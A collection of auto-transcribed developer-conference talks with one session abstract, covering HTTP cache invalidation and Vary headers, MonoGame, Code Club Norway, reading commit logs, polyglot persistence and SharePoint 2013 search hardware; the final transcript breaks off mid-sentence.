Get is called a method. It's also a verb, but it's called a method. The spec calls it a method. And the spec is 10, 15 years old. So if you still call it a verb, welcome to HTTP 1.1. We call it a method or 1.0 actually. And some methods are safe. They're not supposed to change anything like get or head. If you receive head, it's usually safe. I've been told. See, that one works better. I need to stop trying to make jokes that don't involve sex because they don't work. Okay. So those ones don't change anything. However, plenty of methods like post, put, delete, and any unknown method by the server tends to say that the data is invalidated. It makes a lot of sense if you think about it. One of the reasons we have HTTP and one of the constraints of RESTful architectures, which is self-descriptive, this rewind, self-descriptive messages is that we can reason just looking at the message without understanding the content. Now, if you tell me that you're deleting a comment from a blog, it's quite logical to think that my squid server can invalidate the cache and remove it because it's probably not valid anymore if I try to delete it. Now, do you understand that invalidation in HTTP is not like an Ibanez? Who's using an Ibanez cache here? No one? Okay. So some caches get updated by the result of a delete, for example. So the cache now knows that the resource is deleted. In HTTP, we don't do that because we can't tell for sure that the resource has been deleted. What we can tell is whatever was cached should be removed. So we flush the results of a delete. Where do we flush it? There's a couple of locations. Also, a point that is sadly very badly known. If I delete slash unicorns, it's not necessarily slash unicorns that get flushed. It could be the content location header. And I'll remind those of you that have not seen it before. The content location lets you say that the content that you're showing in the response, the picture of the cat, is actually at this address and not at the original URI. So if I have a method that invalidates content and content location is there, that's the URI that will be flushed. If that's not there, then the location header will be there. That's for redirects, things like 302.303. I've posted, I think I have an example of that one. Yes, I posted unicorns.cgi. The result is, hey, found what you wanted. And this is the location. What do we flush in this example? We flush unicorn slash baby. Now, in practice, some caches flush both, just to be sure. But this is the one that should be flushed originally. And if neither are there, then we just flushed the URI. So that's one way of doing it. Now, again, another way that is not in the slides because it's specific to, to square it is to use a purge where you can make a request specifically to your apps, to your reverse proxy saying, please purge this entry because I know I'm not going to need it. So if you have a automated tool that absolutely needs to go and purge those entries and you want to do it specifically for your reverse proxy, you can do that. However, I really, really like when we do standard HTTP. I think it's much nicer. And that's also something new in HTTP caching. It's also in the process of being standardized. So it uses plenty of new requests. And, oh, they're lovely. We have invalidating with links. I can say from the resource from my server, if I post to Ninja Unicorns, the response can contain a list of links that should be invalidated. And I said I'd change some things. So I really know that I'm going to invalidate some entries. So I'm going to take my, for those of you that were there many years ago, agent Resty Galore is on the way back. If you don't know, if you don't understand any of that, just go on my website and check my previous presentations. She's not been out for two years. So Resty Galore is trying to become an HTTP caching Ninja. So we post that picture to Ninja Unicorns and the response is going to look like this. And this is how you invalidate with a cache. We have a new header here called the link header. This is already a standard. It was part of HTTP 1.0, dropped in 1.1. It got re-broad back to life last year. It's useful for plenty of things. The one thing that's useful here is to say, well, for that specific operation you made, I want you to invalidate slash unicorn as well. So the results that we did act upon with this one, but we're telling any cache in the infrastructure between you and the browser that this entry should be invalidated as well. Any question on that? Regarding right. Do these caching instructions apply to Azure Clouds? That's a very good question. Do they have a reverse proxy caching infrastructure on Azure? I'm not sure. Well, I would think that if you have Azure website, you can generate your caching instructions. And if you host squid on Azure, which I assume should be doable, then you would do that as well. So those are the HTTP level. All the stuff that I show in the slides, it's HTTP standards. At some point, it will be implemented by whatever. But I don't know what reverse proxy infrastructure they have on Azure. Good question. I'll check. I'll check. So we can invalidate a whole bunch of resources from one resource that changed. And that's kind of cool. It's kind of useful. We can also do it completely the other way around. See, I knew I was missing slides. I'm going way too quickly. We've got invalidated by. So that's the inverse relationship of the one we just made. This one is a bit more complicated to follow. Here, I go to my Ninja Unicorn Resti Galore titles. You all right? Basically, I want to retrieve the list of titles that Resti Galore has acquired over time. And that list of titles is going to come back. And of course, if I, if poor Resti Galore dies in action or gets deleted, well, chances are this is going to be impacted by it. Take another example. Any change to a post may involve changes to the comments of that post. So instead of saying, by the way, when you get that response invalidate all these things, what we're saying here is, by the way, I'm telling you that whenever this bit changes, you need to flush me as well. So whenever you see anything that changes Resti Galore, please discard me as well. And that looks something like this. We go to our Ninja Unicorns together titles. And we get the list of titles with the link here. So you'll see the link is between brackets. That's the linking specification. Ninja Unicorn Resti Galore and the relationship is called in by. It's not very readable. But that means invalidated by. So you can give a parent resource if you think in terms of having parent and child resources that are dependent upon each other. A resource can give you a list of all the other resources that when they get invalidated, you should get invalidated with. Also implemented in Squid. So go and use it. Now, of course, one of the issues we have at that point is that a lot of reverse proxies that are out there, for example, ISA server or Microsoft full front gateway application management RP2 service to or something like that. I don't know. They changed the name a few times. I think it's full front gateway now. That works as a reverse proxy. ISA server has worked as a reverse proxy since at least 2004. So you can use that. But they don't support the new HTTP extensions I just showed you, of course. However, Squid does. So how can we combine the two together to say, for example, that we want a normal cache to not cache the data at all, but a cache that is aware of those new link headers, there's a way of linked invalidation should cache. We can use the max age instruction. So that's another one that you can put in cache control. This lets you take a resource and say, by the way, if you understand linked relationships, please keep it alive for 60 seconds until you see an invalidation happen. If you don't see invalidation happen, don't keep it around. And for those of you that don't understand that, I will have a max age of zero, which means do not cache. That lets me provide different caching instructions for new servers that supports this extension while still either stopping the caching for old servers or making it at different times. So that means max age here. And that reaches us with vestigalona being a, is not sweet, a caching ninja. So those are all the new HTTP extensions you can use for caching. There's two more things that are not in those slides that I wanted to talk about. The first one that you need to be very careful with is, that slide should be there, but it's in my old slide deck, which died with my laptop yesterday with orange juice. So just one, you, lovely. Cache hits are important. The one thing you want when you cache is to make sure that the cache gets hit, right? If you cache 25,000 variations of the same page, no one will ever hit the cache. Does that make sense? So how many of you know the very header? Few of you? Okay. So now I'm going to do live presentation. Let's see if that works in there. Okay. There you go. Lovely. So one of the things you want to do of course when you cache is to make sure that things get cached. If I get a unicorns like that and the result is 200 okay. Cache control public. Any cache is going to create a cache key behind the scene for this so that it can go and retrieve the data again. What's the cache key going to look like in this example? It's probably going to look like something like slash unicorns because that's the address you tried to type in. Yeah? Whenever you try to retrieve it, you get to an index, you retrieve that very quickly. Now, is that enough as a key? Who thinks it's enough? Who thinks it's not enough? Who thinks I lost, who lost the usage of their hands? See, I can't raise my arms but I have a very good reason I've got sweaty armpits. I can't see yours. Well, it is not enough because, well, it is not always enough because one of the things I could do is to use something called content negotiation, right? And that's going to return me some content unicorns are cool equal true which I think is a valid XML document. Now, this XML document goes into that cache key. What happens is my next request goes get slash unicorns and this time around I will accept application slash JSON. Now, as most of you would know because you've all looked at my restful talks before, you should never use application XML or application JSON as content type because it's evil but for the sake of this demonstration, we'll keep it there. If I only use slash unicorns as my cache key, what would happen? What would get retrieved a second time? Yeah, the XML, not the JSON. So the cache key is not enough at that point. However, I can't just invent from my reverse proxy which cache key needs to exist. So, of course, if you're a well-behaved piece of software, which by the way does not include open raster, you would have a very here where the accept error in it. Well, that tells the system is please add the content of my accept header as the cache key. So what is that going to look like? It's not going to look like something like this. That would be the first key that we stole for the first request and for the second request, we'll probably have another key here that is called JSON. All right? That's how cache keys are built in reverse proxies and even in local cache. If you don't do that, you don't get the right key, you don't get the right content, everything goes poof. Or as I like to call it, tits up. So you want to try and hit those cache keys. Now, you will notice that this is a very simple example and like all simple example, they are great to demo, but they're not actually real world. In the real world, I'm also going to have someone that is going to be very smart with using content negotiation, either because they finally understand how it actually works or because they drank the Kool-Aid a bit too much and they don't understand how evil it can be most of the time. And then application slash XML, Q equals 0.8. So for anyone that's never seen that kind of stuff, those are quality quantifiers and they say, by the way, please give me JSON before XML because I really prefer JSON to XML because it is much better because it doesn't do extensibility and we didn't spend 12 years of our industry time trying to standardize how to do extensible formats. So let's redo it all with JSON. Anyway. So what's the cache key going to look like this time around? I hear you ask and scream. Well, this time around is going to look like that. Can you see where I'm going with this? That's starting to be a bit of a problem. I've got now three different cache keys. Three different things are being cached. If you use eTags, it's the same thing, by the way. eTags also use cache keys like that. That's why strong eTags need to be different for your XML and your JSON. But the cache key is going to implement that. Now, of course, if you're using ASP.net out of the box, you'll have this, which means please vary by anything in the request. At that point, the reverse proxy not being completely stupid, things I'm not going to cache anything, it's easier. So you're going to have to make a bit of an effort to remove that very header. However, how many of you still negotiate some content based on the user agent string? I don't like because I know it happens in the wild. Now, you know who's using Windows? Okay. Who's using.NET? Okay. So one of the things you may not know, and this is, I'm going to finish on that. That way you'll finish a bit early. You can go and have a coffee and I can go to the loo. One of the things you may not know is whenever you use.NET to write code, you're actually using the cache from Internet Explorer. That's all implemented in something called wininet.dll, which means, of course, that the behavior of your.NET application on.NET 4, for example, will be completely different based on which version of Internet Explorer you have installed, which is really cool. But one of the things that Internet Explorer did really badly before, before Internet Explorer 10, was the user agent string. Now, if you negotiate the content based on the browser, your very here is going to have something like that. Now, that also means that you need to understand how Internet Explorer built its user agent string before. The beginning was fixed, modilla, blah, blah, blah. And the thing in the brackets, have you noticed how it expands and contracts and expands and contracts a lot? Sometimes you'll have all the pieces of software you ever installed on this machine, the version of.NET, the version of Office, the version of the atomic clock server that may be in use. I don't know, plenty of stuff. That's because whenever something installs a key in the registry, Internet Explorer takes that and append it to the user agent. What's the problem with that if you have a very user agent? You will never hit a cache key because on average Internet Explorer before version 9, no one has the same user agent key ever. It doesn't happen. And you think that's limited to the user agent key? No, it's limited. It's not because the accept header also works the same way. If a piece of software like Office said, I support this media type, Internet Explorer will randomly add or remove, depending on what it thinks the request is going to be, it's going to change the accept header. So if you use content negotiation and you use Internet Explorer before version 10, you are guaranteed never to have a cache hit. I know you have a very large site, but you're going to have a lot of cache entries. Now, the guys understand that. They fixed it in 8.10. There's a whole blog entry that shows you all the difficulties with working with all versions of IE. So do know these and do know that they're going to impact your cache hits in your cache. And that also means, by the way, that, and this is my recommendation for you, get in the habit of minting new URIs for each of your variants if you use content negotiation. I know I'm the one that introduced the framework with content negotiation out of the box six years ago, and I never did it, and I thought it was wrong, and I changed my mind because I was wrong again. So this is what you should do. Make sure that your URIs are actually including the variant that they have. This increases your cache hits. It makes the API nicer to look at, and it uses content negotiation in the right way. If you don't agree with me, you can either ask me a question about it now, and we can continue discussing it, or you can come and see me at the end. I think we have five minutes left, so I'm going to ask if anyone has any questions on what we've covered. No, no question. Well, I'm going to thank you then. I am Cyril Seb. Just Google me if you want to talk to me or Twitter me. I'll be in the conference. I'll be at the attendees' events this evening, and I shall probably be in every single bar in Oslo just to remind myself of all the places I was many years ago. I want to thank you for spending the time today with me, and I hope you go and get caching.
|
You know the basics of HTTP caching. Setting HTTP expiries on a document has no secret for you, you know how to prevent a browser from caching dynamic content and you're pretty happy with If-Modified-Since. In this session, you will discover the actual difference between strong and weak etags, how to invalidate URIs, use reverse-proxies efficiently and how much freedom the client has in overriding defaults and bossing proxies around. And if you are worried of learning all this on your own, fear not, an old friend will be there learning with us.
|
10.5446/51513 (DOI)
|
Okay. I did. Yeah. Okay. Welcome everybody. Before I start, I want to remind you to fill out the evaluation forms when we're done. I'm going to talk about cross-platform mobile gaming with MonoGame. MonoGame is an open source framework. I'm going to spend the next 10 minutes telling you what it is, what you can do, how you can use it, and give a few examples. But first, why am I here? My name is Runa Dresch-Grims. I work at Capgemini as a developer in Tronheim. I work with.NET, the.NET framework, C-Shop, most of the time. I've been programming since I was eight years old. It's been a while. I always loved computer games. So computer games and that stuff, it's something I always liked to make. And not because I want to publish the games, but because I think it's very good learning, working with games. So MonoGame. MonoGame is an open source cross-platform implementation of the XNA framework. XNA is a game framework made by Microsoft for Windows, the Xbox, and Windows Phone 7. And MonoGame, it's a more or less faithful implementation of the XNA framework. You can use it to make 2D games, 3D games, and it runs anywhere, more or less anywhere. Of course, you can run it on desktop with Windows, Mac, Linux. It runs mobile devices, iOS, Android, Windows Phone, Windows RT. It runs on Raspberry Pi, on PlayStation Beta. And if we remember that this is XNA, you also have the Xbox. So by implementing a game, in MonoGame, you reach a wide variety of platforms. Now, how do you get started? Starting is easy. All you need is a computer, Windows, and Visual Studio. You need Visual Studio to compile content, even though you want your game to run on a Mac or Linux. You will need a Windows PC, yet the guys making the framework are working on a separate content compiler. Content is sounds, textures, graphics, music, that type of content for your game. And it needs to be compiled so that it's formatted for the device you're running on. iPhone use a different graphic format than a Windows box, for instance. If you want your game to run on the iPhone, you will need the tools from Xamarin, Xamarin iOS, and for Android, you will need Xamarin Android. They also have a Mac version called Xamarin Mac. This is a version of the open source Mono framework that is.NET running on the other platforms. If you want your game to run on a Windows phone, Windows RTA, then you will need a Windows 8 PC. And with that, you need some knowledge, of course. It's based on XNA, so the example code is available everywhere on the net. And a framework that helps you build games, 2D games, 3D games, UI, all that kind of stuff. But you will need basic programming knowledge, of course, and you need to know some math, vectors, matrices, that kind of stuff. Using MonoGame is also quite easy. I'm going to give you the shortest how-to ever. I have six minutes left. In MonoGame and in XNA, for that case, you have the concept of a game class. The game class implements your game. You have a game loop, an update method and a draw method that is called continuously. And the update method is where you perform AI calculations, all that stuff, and the draw method draws your game to the screen. And that's it. You have an initialized method where you can set up the screen resolution, connect to servers, anything you need to do, and load content where you load your textures, load sound if you need that. And you can use the unload content method to clean up, but usually you don't care. The game is going to close. Just a few tips on making games. Remember to focus on one platform first. It's much easier. I prefer to work on the Windows phone since the tooling is so great. And when my game is running, it's usable, then I port it to, say, the iPhone and Android. And usually it's done in maybe an hour, less than that. You can use more or less exactly the same code on all platforms. If you want to use, say, the GPS or accelerometer, the camera on your phone, or mobile device, then a good trick is to make an abstraction of it. For example, I have a game where I want to use gravity. I want to know what's down. And then I define an interface, say, the gravity service, that always tells me what is down. And then on my phone, on the platforms, I implement that service. And that implementation can... I can make it fit the platform. So the accelerometer on the Android device doesn't behave exactly like on the Windows phone device. But using abstractions and interfaces, I can use more or less exactly the same code anyhow. And since we are on mobile platforms, remember to think performance. Always think performance. Try to not create objects all the time. Try to reuse them. Don't use reflection. It's low. You know that. But link is also terribly slow. So don't use that and try to pre-calculate stuff. Don't do as little as possible for each time your game loop runs. And of course, remember good coding practices like test your code, separate concerns, and so on and so on. You know it. Now, and the final challenge, of course, finishing the game. That's the hard part. And I can't help you with that. That's your job. I want to give you a few examples of what monogame can do. Because when I heard of monogame the first time, I thought, okay, it's for simple games. And you can, of course, make simple games with it. But you can also make quite impressive games. There is a game called Bastion. It's an open-game playing game that runs on the Xbox or Mac and Linux. And it's a bestseller. They're selling loads of licenses. It's story-driven, lots of graphics, lots of music. It looks incredible. It's really fun to play. Then you have Fez. It's a combination of a 2D and 3D platform game. You have to see it to understand how it works. It's brilliant. It also runs on Windows and XNA using monogame. And finally, Skulls of the Shogun. It's a turn-based strategy game, a completely different type of game. It also looks really nice. And it runs on all kinds of Windows devices. Windows Phone, Windows 8, Windows RT, and, again, the Xbox. Now, if you guys want to know more, I'm staying here for the rest of the conference. You can take contact on Twitter, email, whatever you want. A lot of talk gaming. And just a few resources. Monogame.net is the site where the guys publish information about games, tutorials, all that kind of stuff. Since this is open source, you can find it on GitHub, download, clone it. On GitHub, they have lots of resources regarding sample games and everything. So it's recommended. And this is based on XNA, so more or less all XNA tutorials are valid for Monogame. So just Google them. There is enough. That's everything. Thank you very much for listening. Thank you. Hello. You look like you've found a lot. Are your parents? Anyone? Raise hands. Children between 8 and 18, keep them up. Now, keep them up. Who are you going to go back and establish code clubs? Exactly. Very wonderful. It's not very hard, actually. I'm going to tell you a little bit how to do it. And we try to remove all the obstacles that you might meet. My name is Simon Somfurt. I work as CTO at Bouwer in Oslo. And I'm going to tell you a little bit about why we started to start this movement and what we're trying to accomplish. It's not very polite to plug your employer, but I had to give them a big thank you for allowing me to do this in my daytime since it exploded after about in April. And also, I would like to extend a big thank you to Pugamut Wigling, who hosted this workshop for the children two days ago. Did any of you see that go there? It was wonderful. We even got t-shirts for the children. With Code Club on it. And real badges, so they felt like they were in the conference. And also, Linda Sanvik, she established Code Club in England. And they are in 750 cities in England. So she helps us. So what's the problem? Sources within the EU says that IT represents 5% of GDP in Europe. That's not a lot, I said. But it represents 25% of the growth in Europe. And 40% of productivity growth. So IT is in all the companies, all the government, everywhere. You can't really extract it. It's in there. I was lucky to have a Commodore 64, which really forced me to learn coding because that's the only way I could do anything useful with it. The problem is that with the advent of all these good user interfaces, all the people, all the children have been removed from the possibility to know that they can even start tinkering on what's behind the scenes. It's like a car. You don't know how to, you don't know that you can look under the bonnet and see that's something you can do there. So they're becoming digital leaves. Now, if they want to change something, if they want to not just starting to make playlists and Spotify, but actually want to make another music streaming service, how would they go about that? How can we actually have more recruits to pay our pensions in the IT industry? Well, the thing is that the way the children will actually experience this will be more like this. I'm sorry, Dave. I'm afraid I can't do that. So what can we do to help them? I think that the government should be teaching, should be actually establishing programming in the schools. I mean, the cold clubs are a good thing because you teach children to program, but it will be in areas where the people are well educated and resourceful. And I will actually just keep on with the social differences. And what do the government do? It's a wonderful quote. So I sit on the advisory board of the local polytechnic, Hói Úá, engineering school in Oslo, and they were complaining about not having enough qualified student recruits. And I also sit on the board of Datafedinín in Oslo, and we established just a local group to teach local kids to code. We thought just to have that in Oslo. And then it really, really took off. It was like I just flipped the switch and people came running because everybody seemed to have this in mind. And I got with me Torga, a waterhouse, who is a very resourceful person from IKOTE Norge, ICT Norway. And we run this together. It's a movement. And what we want to do is to make the children be ready to, like I said, master and create things with digital technology, not just playlists in Spotify. So what do we do to accomplish that? Well, we arrange local code clubs or help people do that, and we help schools to teach programming. Since April, we have been establishing contracts with 20 schools in Norway who will start teaching programming. And we arrange family coding events, like I showed you the picture of first there. So you may ask, what to teach? Well, in the ages from 8 to about 12, you can start with visual environments like scratch. Anyone try that? It's very nice. Even if you're not a programmer as a parent, you can start using it. And Codo, which is Microsoft's alternative. And for the elder ones, you can use Python, which I think is the best to teach real programming. And it was made to be easy to learn. Now, for those of you who put your hands up, it's not really difficult to teach programming because there's full coursework available. We've been allowed to translate all the sessions from Code Club in England. We have a wonderful cooperation with Computing at School, which is aimed at teaching at teachers in England. And they've allowed us to take all the material for all the levels and just use it and be our mentors. And the Code Academy also allows us to just translate and use everything. They're very, very caring and very, yeah, I just use everything. I can help you. So no problem for those of you who start Code Clubs. And we have become 750 people since April 2nd. So we must have hit the nerve, in a sense. And we're established groups in, I think, 19 different cities. So you may ask, what type of organization are we? We're not really an organization. We don't have really much of a hierarchy. We have no much bureaucracy. We're just there to create value, to teach the children. They say organizations organize movements move. So we try to be a movement. And there's been done some research about this and how such movements create value. Basically, they have a website which allows people to do three things. Collect and distribute documented knowledge, like coursework, like experience papers, like how to talk to your local school board and so on. Connect those who know with those who don't. Like, for example, teachers who want to know, they can be mentored. And we can connect and mobilize those who can solve or create something. For example, starting Code Clubs. So that's our aim. And we're getting there. We're getting a website which allows us to do that. Which means that we don't need much staff. Like, computing a school in England, they say, no money, no staff. And I don't think we really need that in the long run. Sponsors, of course. Sponsors who can pay for robots, for arduinos, to have kids that can be lent and borrowed in the schools. Yes, of course, but not much for just administration. If you want to read more about this, I was allowed to have a write something in this paper here, this column there. And it's also on their website. But I'd like to add something. I'm just a tech bloke from the industry. I'm just someone else. I mean, I just flipped the switch. It was an explosion waiting to happen. And the real heroes, they were the ones who came before us. There were teachers, university lecturers, programmers, who did a lot on their own, but they didn't know about each other. So we gave them a home. And I think that our success is really attributed to their experience and their willingness to share and have made us reach a long way just in a few months. So back to what you can do. I want to think if you can take a friend in the business, a neighbor, if you're sitting on the school board for the parents, maybe you can suggest it. We're trying to make all this experience available on the website. So you have as few obstacles as possible if you want to do this. And all you need to do is to have kids, the coursework, a venue, friends, and there you go. If you want to know more about this or join in, I'm sure that I'm in England. You have a computer at school. You have code clubs in the US. You have code.org. I think you all have these things in all the countries. But here in Norway, we're on that website. Join in. We'll end here. Follow us on Twitter, or on Facebook, and form a code club. Thank you. Thank you. Thank you. Thank you. Thank you. We created a system for your safety. You must share your knowledge. Sharing knowledge is very hard. At least I think so. Even if you're part of a very small team, having the overview of what's going on, especially in the code base, perhaps, requires quite some effort from all the participants in the team. And the problem with the lack of this overview is that it tends to make developers solve the same problems several times, right? You don't know what your colleague did two days ago. He might write some code that you actually need today, so you didn't know. You write it as well. And the lack of knowledge also can make developers make errors. And you tend to repeat the history. And that's not a good idea, right? We want to keep dry. So this clever man here said long before me, but he tend to agree that those who can't learn from the history are doomed to repeat it. So I think we all can agree that learning what our colleagues have been doing before us is very important. If we don't do that, we'll end up in a maintenance hell. We have lots of duplicated code, lots of errors, and stuff like that. Now, there are some practices I'm pretty sure all of you are familiar with, like pair programming. Pair programming and code reviews might help with this problem. But the thing is, you only share your knowledge with one other person. If you're five on that team, the rest of the guys don't know. So by now, you probably wonder who am I? My name is Thomas Peterson. I work at Miles in Bergen as a consultant. I do software development, architecture, stuff like that, at clients. And I'm here today to teach you a little thing that I started doing for, I don't know, maybe five, six years ago. It's not a silver bullet, but it's something, and I can almost certainly promise you this, it's something that will improve the quality of what you as an individual, as well as your team delivers. So with no further ado, it goes like this. Drink a lot now. I do, and I think most of my colleagues do. You start the day with a cup of coffee, and then you go to your computer, you sit down, and you open some yesterday's news. And you sit there for like 10, 15, 20 minutes, I don't know, an hour, perhaps some of you, before you actually start working. And that's fine. You need something to get going in the morning. That's totally fine. But what I suggest you're doing instead is replacing that old news from yesterday, which isn't really that interesting either, with this. This is a commit log for those who doesn't use get. This is a commit log from get. So you pull this up, and you can do it in any way you like. If you use get up, it's excellent. If you use TFS or whatever, you can do this. So you pull up this log, and you start reading what was done yesterday. So you go back to, well, not seven months ago, but at least back until yesterday, you read the commit messages, and you also read the code that was checked in. When you find something good in here, you will learn something. When you find something not that good, you have an excellent opportunity to tell your co-worker that maybe this wasn't a good idea. Maybe I can help you correct it. And basically, it's just that. It's that simple. So if you start your morning routine with a cup of coffee and pull up this log and actually read through it, you will be amazed by how much stuff you actually will learn. And you might experience it can be a bit hard in the beginning, especially if you have a lot of crappy commits. Um... Has anyone done that? No. There's one. But guess what? You actually will get better at committing as well. So he has improved quite a lot already here. And you will learn a lot about committing and actually making the history in your source control useful. So you can actually use it for more than just a backup of files. So not only will your commits be more focused, you probably end up with having one feature in there at a time, code cleanups go into separate commits and stuff like that. And you probably also learn to make more specific commit messages. It might take some time, a couple of months, years, who knows, but you will get better. And if you start doing this and encourage your team to do this, the source control, as I mentioned, will no longer just be a backup of your files. You can actually use this history to both learn from it and also it's much more focused, so it's much more easier to go back and find errors and stuff like that. Um... I want to mention one more thing, and I briefly mentioned it in the beginning. Code reviews. Code reviews are also very hard. Not doing them necessarily, but getting people to do them. If you do this little exercise here, which takes you a couple of minutes each day, you also get code review for free. If you spot an error in there, you can fix it or tell someone. And doing code review is a good practice, right? I hope everybody agrees. Okay, good. It's not all me then. So you get it for free. And you might not even call it a code review. You can call it a check-in review or daily routine or whatever. And why does this work, in my opinion, or at least from my experience, is doing code review is another chore or a task that are laid upon the developer. Developers want to code. They do not want to test. They do not want to do reviews and leave. Well, not write documentation. That's certainly... So it's another task that are laid upon them, and they really don't have the time for that. Another thing is that a code review can... Someone can feel like you're looking into their code trying to see if it's screwed up, right? With this approach, you eliminate all that. You do this for your sake, for learning, and then again improving the entire team. And actually, you'll be amazed how much you will find in code. Not only errors, but you'll learn a lot of stuff about domain you're working in, fix errors, and stuff like that. So, on Monday, most of you will probably return to your office. And my hope or whatever is that you will actually start doing this, start learning from the history, and stop repeating it, at least, and encourage also your teammates to do the same. As I said, I've done this for five, six years now. The current team that I work in, I think almost everybody does it. And it's been an amazing help for us. And it's very easy. It takes basically no effort. You're going to drink that cup of coffee anyway, so... Thanks. applause applause applause Yes. Hello, everyone. My name is Ullmar Tamerk. I work at Bit Consulting, and I'm here to talk about polyglot persistence. But first, I'm going to talk a little bit about architecture. What's the starting point of good architecture? My view, architecture often starts by figuring out what needs and requirements the customer has for the application you're going to make. And in order to create what the customer needs, we have to know the needs and we have to know their requirements. And we draw boxes and we draw arrows. And these systems talk with each other on different protocols. Some on soap, some on rest, SQL, queues, et cetera. Some synchronous, some asynchronous. And we have different requirements for all these systems. And we keep on drawing and we create the system that meets the needs of the customer. And at the end, we add a repository, one database. And the challenge we face by adding one database is that one database often won't be enough to meet the customer needs. Let's say you choose to use a relational database. You get challenges with performance, with scaling, with object relational impedance. If you try to use a key value data store, you have problems with relations between the data. You don't have relations in key value stores. And if you use a graph database, you get challenges with scaling and object lookups. And whatever database you choose, you will meet some challenges. And we're aware of this. We know the strengths and weaknesses of, let's say, a relational database. But most of the time, we don't do anything about it. And we have, it's so easy for us to always choose the same database technology. We don't inspect the requirements or needs of the customer when we choose database. If you had done that, we would have seen that choosing the correct database technology isn't an easy task. So let's create an application. And this application so far has one requirement. It needs to read and write data. That's the only requirement we have. And usually, if we want persistence in our architecture, it's because we need to read and write data. That's the primary need for persistence. And if we follow the simplest thing that could possibly work, and these are the needs, the best solution in my mind is a key value store. It has three operations. It has get, put, and delete. So we get the third one for free. Because given these needs, the most important thing about the database is that it's easy to use, that it's fast, and it doesn't mess up your code. Your domain model will look the same in the database. But then the customer comes and he has another need. He wants to search the data. That's no surprise because so far we only have lookup, and that only gets us this far. Often you need to, let's say you have a personal database, you need to search by name, or you want to find all people living in Oslo. And a key value store doesn't support those requirements. And relational database does, but not very good. So we need search. And lots of systems have a search engine. Like Microsoft figured that search is so important so they bought fast in order to get the search engine in SharePoint. And all content management systems have both the database and the search engine. So in order to search, we add the search engine to our architecture. Not the big problems architectural wise. The application has to talk to both the key value store and the search engine. And if you get some transactional problems, you can add some synchronization. So hopefully the data will stay the same. Then the customer comes along and has a third demand. He needs relational search. And search engines doesn't do that very well. It can do it, but with a lot of duplication and heavy queries can be done, but it's not good at it. Let's say I'm creating an application from a consultant firm. And we have an employee database. And the seller comes along and wants to find a consultant that has experience with F-sharp in two different projects. Has a five-year experience as a consultant. Has these specific types of certifications. So in this query, it's possible to run in a search engine. It's possible to run in a relational database, but that join is hard to write, hard to read, and heavy to execute. If you use a graph database, that query is easy to write and read and really, really fast to execute. So we choose a graph database. The problem though is that this architecture doesn't look that very good. The applications have to talk to three different databases, and the databases has to know of each other. So let's remove those relations. And let's remove the relations between the database. And reorganize. And we have this. So we have three databases, but two of those databases doesn't do anything. They need some data. In order to give them data, we add an persistent event store. So every time there's a change to the data, it's written to the key value store and the event store. And we hook up these other databases to that event store in order to those so they can get some data. And it's a good thing if this event store is persistent, because if we have to take down the search engine and add a new hard drive or something, we can plug it in and retrieve all events since last time we were connected. Or if you want to add a completely new database, we can just play back all the events and fill up the new database. That's what we have to do in order to meet these requirements. The customer has a need to generate reports. Suddenly the data warehouse people or statistics or economics comes along and they have bought this wonderful reporting tool and they want statistics. Problem is that we have a search engine, a key value store and a graph database. And there's no reporting tools that talk to these data sources. And there's no problem. We just add a new listener to the event store, a relational database. And there are several positive things about this. But first thing is that it's easy to add and it's easy to fill up with data because we have all the changed events. And the second thing is that these folks can do whatever they want with this relational database because our application isn't dependent on it. So they can run heavy reporting jobs in the middle of the day while our application is in production. We are not affected by it. So that is polyglot persistence. At least it's one way of implementing polyglot persistence. And we know there's no silver bullets in anything. Nothing programming language, nothing operating systems, nothing libraries and not in databases. Relational database may seem like a silver bullet, but it's not. It's not the best solution for every problem. You pick the database that satisfies the needs you have there and then and you build an architecture that allows you to expand and accept new requirements from the customer. Because those requirements will come. Thank you. Thank you. Microsoft moving into hardware business because you saw that the hardware requirements they have to implement enterprise search is huge. I'm going into that. To simplify our task in the project, we needed to index 40 million documents and to persist the 10 queries per second. I used a query from our middleware into the index is one query. And that comes from a user texting in a search box and hitting the search button. But before I continue, how many of you work with SharePoint today? And how many of you work with Search? Some of you. Good. All right. Let's continue. So to implement search or create an infrastructure that supports these needs, we need a web frontend. That is where we present our search results, where we present the search box. We need some indexes. That's where the system persists the index or create the binary index of the content that we want searchable. We actually need four of these. There's a maximum limit that SharePoint defines. The maximum limit is 10 million documents per index. We also need to get the documents from the source system. A source system can be either SharePoint itself. It can be file systems. It can be databases. And it can be any custom content sources that you create. And of course, also web pages. There's a new component in SharePoint 2030. That is analytics. And that is a process that can give you information of how people are using the system and especially search. We need some admin components. We need that query processing. That's where the logistics or administration of the query, each query has to ask all the indexes and has to get the answer from all the indexes. And it manipulates it and sends it to the server. That's the query processing unit and what it does. One more admin component. It's a search admin. For documents to come into the index, it needs to be handled in some way. It needs to be processed. It's converted from a binary data to a text form that the index can store. And that's done in the document processing units or components. And we have a lot of them. That makes us be able to process from 50 to 100 documents per second when we do a full speed on the crawl. And we need a lot of databases. Now we have a setup that can handle 40 million documents. In theory, it can handle 10 queries per second. But if one of these nodes disappears, the whole system is down. So we need redundancy. We need another web-funded. We need a new set of indexes. We need crawling and analytics. And of course, the doc book. Databases as well. So basically to handle 40 million documents, we need 12 nodes. In our project, we used virtual machines, which were hosted on two physical servers. What we also did was split the two parts of the farm into two separate data centers, which means that a whole data center can have their power cut off. And such system will still be up and running and working fine. Both with updating the new content and also giving results from queries. We also added a new business millware, which is called Comparifront, which adds some additional functionality to search. We have done some content enrichment, where you can do some custom changes to document coming into the index. Yeah. Basically, so the infrastructure and investments. We have 12 VMs. For each VM, we have eight cores, which basically results in 96 cores. A lot of memory. We started off with 16 gigabytes of memory, but we had to double that to get the performance that we needed. We need a lot of disk. System disk and data disk. The data disk contains the log files and binary index. That has actually improved dramatically from the last version of Fast, so that's quite good. And a search system is also very IO dependent. So per indexer, the recommendation is 200 IOPS. So that basically means we need a system that can handle at least 1600 IOPS. That's quite much. This is also a big improvement from the last version of Enterprise Search and SharePoint. In addition to this, we need fiscal servers. We have two. We need the database servers, load balancers. We need a good sound system and someone that can set that up properly. Domain controllers and other networking. You need a lot of licenses, SharePoint, SQL, Windows, Visual Studio, and in our project, you also needed compare front licenses. And to properly work with developing on SharePoint on this SharePoint search solution, you also needed a development environment. That is a single VM with four cores and 16 gigabytes of memory. We had a QA system, which was two nodes, the same size as the production. We had a test system with a single node, the same specs as the production. And we had a user acceptance test environment, which was exactly the same as production. So a lot of hardware. We had extra two fiscal servers to handle the UAT system, and the rest of the virtual server was placed on a separate development environment. So key points that you have learned, what to work with Search in SharePoint 2013 and doing more than just setting it up and turning on Search. That means that you have to 